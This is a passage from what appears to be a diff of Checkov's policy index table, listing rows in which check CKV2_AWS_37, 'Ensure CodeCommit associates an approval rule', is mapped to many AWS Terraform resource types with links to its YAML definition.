[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1002 | CKV2_AWS_37 | resource | aws_route53_record | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1003 | CKV2_AWS_37 | resource | aws_route53_resolver_endpoint | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1004 | CKV2_AWS_37 | resource | aws_route53_resolver_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1005 | CKV2_AWS_37 | resource | aws_route53_resolver_rule_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1006 | CKV2_AWS_37 | resource | aws_route53_vpc_association_authorization | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1007 | CKV2_AWS_37 | resource | aws_route53_zone | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1008 | CKV2_AWS_37 | resource | aws_route53_zone_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1009 | CKV2_AWS_37 | resource | aws_route_table | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1010 | CKV2_AWS_37 | resource | 
aws_route_table_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1011 | CKV2_AWS_37 | resource | aws_s3_access_point | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1012 | CKV2_AWS_37 | resource | aws_s3_account_public_access_block | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1013 | CKV2_AWS_37 | resource | aws_s3_bucket | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1014 | CKV2_AWS_37 | resource | aws_s3_bucket_analytics_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1015 | CKV2_AWS_37 | resource | aws_s3_bucket_inventory | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1016 | CKV2_AWS_37 | resource | aws_s3_bucket_metric | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1017 | CKV2_AWS_37 | resource | aws_s3_bucket_notification | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1018 | CKV2_AWS_37 | resource | aws_s3_bucket_object | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1019 | CKV2_AWS_37 | resource | aws_s3_bucket_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1020 | CKV2_AWS_37 | resource | aws_s3_bucket_public_access_block | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1021 | CKV2_AWS_37 | resource | aws_sagemaker_endpoint | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1022 | CKV2_AWS_37 | resource | aws_sagemaker_endpoint_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1023 | CKV2_AWS_37 | resource | aws_sagemaker_model | 
Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1024 | CKV2_AWS_37 | resource | aws_sagemaker_notebook_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1025 | CKV2_AWS_37 | resource | aws_sagemaker_notebook_instance_lifecycle_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1026 | CKV2_AWS_37 | resource | aws_secretsmanager_secret | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1027 | CKV2_AWS_37 | resource | aws_secretsmanager_secret_rotation | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1028 | CKV2_AWS_37 | resource | aws_secretsmanager_secret_version | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1029 | CKV2_AWS_37 | resource | aws_security_group | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1030 | CKV2_AWS_37 | resource | aws_security_group_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1031 | CKV2_AWS_37 | resource | aws_securityhub_account | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1032 | CKV2_AWS_37 | resource | aws_securityhub_member | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1033 | CKV2_AWS_37 | resource | aws_securityhub_product_subscription | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1034 | CKV2_AWS_37 | resource | aws_securityhub_standards_subscription | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1035 | CKV2_AWS_37 | resource | aws_service_discovery_http_namespace | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1036 | CKV2_AWS_37 | resource | 
aws_service_discovery_private_dns_namespace | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1037 | CKV2_AWS_37 | resource | aws_service_discovery_public_dns_namespace | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1038 | CKV2_AWS_37 | resource | aws_service_discovery_service | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1039 | CKV2_AWS_37 | resource | aws_servicecatalog_portfolio | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1040 | CKV2_AWS_37 | resource | aws_servicequotas_service_quota | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1041 | CKV2_AWS_37 | resource | aws_ses_active_receipt_rule_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1042 | CKV2_AWS_37 | resource | aws_ses_configuration_set | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1043 | CKV2_AWS_37 | resource | aws_ses_domain_dkim | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1044 | CKV2_AWS_37 | resource | aws_ses_domain_identity | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1045 | CKV2_AWS_37 | resource | aws_ses_domain_identity_verification | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1046 | CKV2_AWS_37 | resource | aws_ses_domain_mail_from | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1047 | CKV2_AWS_37 | resource | aws_ses_email_identity | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1048 | CKV2_AWS_37 | resource | aws_ses_event_destination | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1049 | CKV2_AWS_37 | resource | 
aws_ses_identity_notification_topic | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1050 | CKV2_AWS_37 | resource | aws_ses_identity_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1051 | CKV2_AWS_37 | resource | aws_ses_receipt_filter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1052 | CKV2_AWS_37 | resource | aws_ses_receipt_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1053 | CKV2_AWS_37 | resource | aws_ses_receipt_rule_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1054 | CKV2_AWS_37 | resource | aws_ses_template | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1055 | CKV2_AWS_37 | resource | aws_sfn_activity | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1056 | CKV2_AWS_37 | resource | aws_sfn_state_machine | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1057 | CKV2_AWS_37 | resource | aws_shield_protection | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1058 | CKV2_AWS_37 | resource | aws_simpledb_domain | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1059 | CKV2_AWS_37 | resource | aws_snapshot_create_volume_permission | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1060 | CKV2_AWS_37 | resource | aws_sns_platform_application | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1061 | CKV2_AWS_37 | resource | aws_sns_sms_preferences | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1062 | CKV2_AWS_37 | resource | aws_sns_topic | Ensure 
CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1063 | CKV2_AWS_37 | resource | aws_sns_topic_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1064 | CKV2_AWS_37 | resource | aws_sns_topic_subscription | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1065 | CKV2_AWS_37 | resource | aws_spot_datafeed_subscription | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1066 | CKV2_AWS_37 | resource | aws_spot_fleet_request | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1067 | CKV2_AWS_37 | resource | aws_spot_instance_request | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1068 | CKV2_AWS_37 | resource | aws_sqs_queue | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1069 | CKV2_AWS_37 | 
resource | aws_sqs_queue_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1070 | CKV2_AWS_37 | resource | aws_ssm_activation | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1071 | CKV2_AWS_37 | resource | aws_ssm_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1072 | CKV2_AWS_37 | resource | aws_ssm_document | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1073 | CKV2_AWS_37 | resource | aws_ssm_maintenance_window | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1074 | CKV2_AWS_37 | resource | aws_ssm_maintenance_window_target | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1075 | CKV2_AWS_37 | resource | aws_ssm_maintenance_window_task | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1076 | CKV2_AWS_37 | resource | aws_ssm_parameter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1077 | CKV2_AWS_37 | resource | aws_ssm_patch_baseline | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1078 | CKV2_AWS_37 | resource | aws_ssm_patch_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1079 | CKV2_AWS_37 | resource | aws_ssm_resource_data_sync | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1080 | CKV2_AWS_37 | resource | aws_storagegateway_cache | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1081 | CKV2_AWS_37 | resource | aws_storagegateway_cached_iscsi_volume | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1082 | CKV2_AWS_37 | resource | aws_storagegateway_gateway | 
Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1083 | CKV2_AWS_37 | resource | aws_storagegateway_nfs_file_share | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1084 | CKV2_AWS_37 | resource | aws_storagegateway_smb_file_share | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1085 | CKV2_AWS_37 | resource | aws_storagegateway_upload_buffer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1086 | CKV2_AWS_37 | resource | aws_storagegateway_working_storage | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1087 | CKV2_AWS_37 | resource | aws_subnet | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1088 | CKV2_AWS_37 | resource | aws_swf_domain | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) 
| +| 1089 | CKV2_AWS_37 | resource | aws_transfer_server | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1090 | CKV2_AWS_37 | resource | aws_transfer_ssh_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1091 | CKV2_AWS_37 | resource | aws_transfer_user | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1092 | CKV2_AWS_37 | resource | aws_volume_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1093 | CKV2_AWS_37 | resource | aws_vpc | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1094 | CKV2_AWS_37 | resource | aws_vpc_dhcp_options | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1095 | CKV2_AWS_37 | resource | aws_vpc_dhcp_options_association | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1096 | CKV2_AWS_37 | resource | aws_vpc_endpoint | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1097 | CKV2_AWS_37 | resource | aws_vpc_endpoint_connection_notification | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1098 | CKV2_AWS_37 | resource | aws_vpc_endpoint_route_table_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1099 | CKV2_AWS_37 | resource | aws_vpc_endpoint_service | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1100 | CKV2_AWS_37 | resource | aws_vpc_endpoint_service_allowed_principal | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1101 | CKV2_AWS_37 | resource | aws_vpc_endpoint_subnet_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1102 | 
CKV2_AWS_37 | resource | aws_vpc_ipv4_cidr_block_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1103 | CKV2_AWS_37 | resource | aws_vpc_peering_connection | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1104 | CKV2_AWS_37 | resource | aws_vpc_peering_connection_accepter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1105 | CKV2_AWS_37 | resource | aws_vpc_peering_connection_options | Ensure CodeCommit associates an approval rule | Terraform | 